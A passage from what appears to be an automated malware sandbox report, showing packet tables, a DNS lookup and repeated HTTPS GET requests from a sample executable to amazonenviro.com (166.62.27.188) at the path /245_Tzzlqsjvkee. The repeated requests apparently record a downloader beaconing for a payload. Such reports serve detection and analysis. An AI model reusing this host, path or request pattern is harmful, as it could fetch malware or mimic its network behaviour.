              Jan 14, 2025 08:26:57.333060980 CET50115443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:57.334573030 CET50115443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:57.334585905 CET44350115166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:57.334781885 CET44350115166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:57.336658955 CET50115443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:57.379338980 CET44350115166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:57.927135944 CET44350115166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:57.927453041 CET44350115166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:57.927525043 CET50115443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:57.927587986 CET50115443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:57.927614927 CET44350115166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:57.927792072 CET50115443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:57.927802086 CET44350115166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:58.040399075 CET50116443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:58.040453911 CET44350116166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:58.040559053 CET50116443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:58.040913105 CET50116443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:58.040996075 CET44350116166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:58.041064024 CET50116443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:58.051851988 CET50117443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:58.051934004 CET44350117166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:58.052038908 CET50117443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:58.054033041 CET50117443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:58.054050922 CET44350117166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:58.943671942 CET44350117166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:58.943766117 CET50117443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:58.945416927 CET50117443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:58.945425987 CET44350117166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:58.945981979 CET44350117166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:58.947297096 CET50117443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:58.991329908 CET44350117166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:59.520216942 CET44350117166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:59.520306110 CET44350117166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:59.520426035 CET50117443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:59.520515919 CET50117443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:59.520543098 CET44350117166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:59.520559072 CET50117443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:59.520566940 CET44350117166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:59.639503002 CET50118443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:59.639561892 CET44350118166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:59.639692068 CET50118443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:59.639856100 CET50118443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:59.639904976 CET44350118166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:59.639969110 CET50118443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:59.679076910 CET50119443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:59.679116964 CET44350119166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:59.679230928 CET50119443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:59.679677010 CET50119443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:59.679692030 CET44350119166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:00.582537889 CET44350119166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:00.582789898 CET50119443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:00.583971977 CET50119443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:00.583986044 CET44350119166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:00.584217072 CET44350119166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:00.585447073 CET50119443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:00.627341032 CET44350119166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:01.217547894 CET44350119166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:01.217624903 CET44350119166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:01.217693090 CET50119443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:01.217830896 CET50119443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:01.217853069 CET44350119166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:01.217869997 CET50119443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:01.217878103 CET44350119166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:01.336817026 CET50120443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:01.336857080 CET44350120166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:01.336929083 CET50120443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:01.337121964 CET50120443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:01.337138891 CET44350120166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:01.337196112 CET50120443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:01.339956999 CET50121443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:01.339994907 CET44350121166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:01.340095043 CET50121443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:01.340547085 CET50121443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:01.340563059 CET44350121166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:02.247807026 CET44350121166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:02.247994900 CET50121443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.249464035 CET50121443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.249484062 CET44350121166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:02.249727011 CET44350121166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:02.251087904 CET50121443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.291410923 CET44350121166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:02.839227915 CET44350121166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:02.839427948 CET44350121166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:02.839618921 CET50121443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.839618921 CET50121443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.839618921 CET50121443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.951972961 CET50122443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.952011108 CET44350122166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:02.952080965 CET50122443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.952935934 CET50122443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.952960968 CET44350122166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:02.953015089 CET50122443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.957097054 CET50123443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.957154989 CET44350123166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:02.957231045 CET50123443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.958112001 CET50123443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:02.958123922 CET44350123166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:03.148428917 CET50121443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:03.148473024 CET44350121166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:03.876552105 CET44350123166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:03.876625061 CET50123443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:03.878824949 CET50123443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:03.878834009 CET44350123166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:03.879105091 CET44350123166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:03.881059885 CET50123443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:03.923342943 CET44350123166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:04.466873884 CET44350123166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:04.467050076 CET44350123166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:04.467122078 CET50123443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:04.467221975 CET50123443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:04.467240095 CET44350123166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:04.467252970 CET50123443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:04.467258930 CET44350123166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:04.580569983 CET50124443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:04.580642939 CET44350124166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:04.580749035 CET50124443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:04.581984997 CET50124443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:04.582030058 CET44350124166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:04.582101107 CET50124443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:04.584680080 CET50125443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:04.584723949 CET44350125166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:04.584815979 CET50125443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:04.585103035 CET50125443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:04.585114002 CET44350125166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:05.468288898 CET44350125166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:05.468383074 CET50125443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:05.469700098 CET50125443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:05.469712019 CET44350125166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:05.469959974 CET44350125166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:05.471215010 CET50125443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:05.515338898 CET44350125166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:06.046183109 CET44350125166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:06.046566963 CET44350125166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:06.046669960 CET50125443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:06.046734095 CET50125443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:06.046771049 CET44350125166.62.27.188192.168.2.10
              Jan 14, 2025 08:27:06.046801090 CET50125443192.168.2.10166.62.27.188
              Jan 14, 2025 08:27:06.046816111 CET44350125166.62.27.188192.168.2.10
              TimestampSource PortDest PortSource IPDest IP
              Jan 14, 2025 08:25:01.687921047 CET5585953192.168.2.101.1.1.1
              Jan 14, 2025 08:25:01.701241016 CET53558591.1.1.1192.168.2.10
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jan 14, 2025 08:25:01.687921047 CET192.168.2.101.1.1.10x8601Standard query (0)amazonenviro.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jan 14, 2025 08:25:01.701241016 CET1.1.1.1192.168.2.100x8601No error (0)amazonenviro.com166.62.27.188A (IP address)IN (0x0001)false
              • amazonenviro.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.1049706166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:03 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:03 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:03 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.1049708166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:04 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:05 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:05 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.1049710166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:06 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:06 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:06 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.1049718166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:08 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:08 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:08 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.1049728166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:09 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:10 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:10 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.1049738166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:11 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:11 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:11 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.1049750166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:13 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:13 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:13 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.1049762166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:14 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:15 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:15 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.1049773166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:16 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:16 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:16 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.1049786166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:18 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:18 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:18 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.1049799166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:19 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:20 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:20 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.1049809166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:21 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:21 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:21 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.1049822166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:22 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:23 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:23 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.1049835166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:24 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:25 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:25 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.1049847166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:26 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:26 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:26 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.1049860166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:27 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:28 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:28 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.1049871166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:29 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:30 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:29 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.1049884166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:31 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:31 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:31 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.1049895166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:32 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:33 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:33 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.1049906166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:34 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:34 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:34 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              20192.168.2.1049919166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:36 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:36 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:36 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              21192.168.2.1049932166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:37 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:38 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:38 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              22192.168.2.1049944166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:39 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:39 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:39 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              23192.168.2.1049958166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:41 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:41 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:41 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
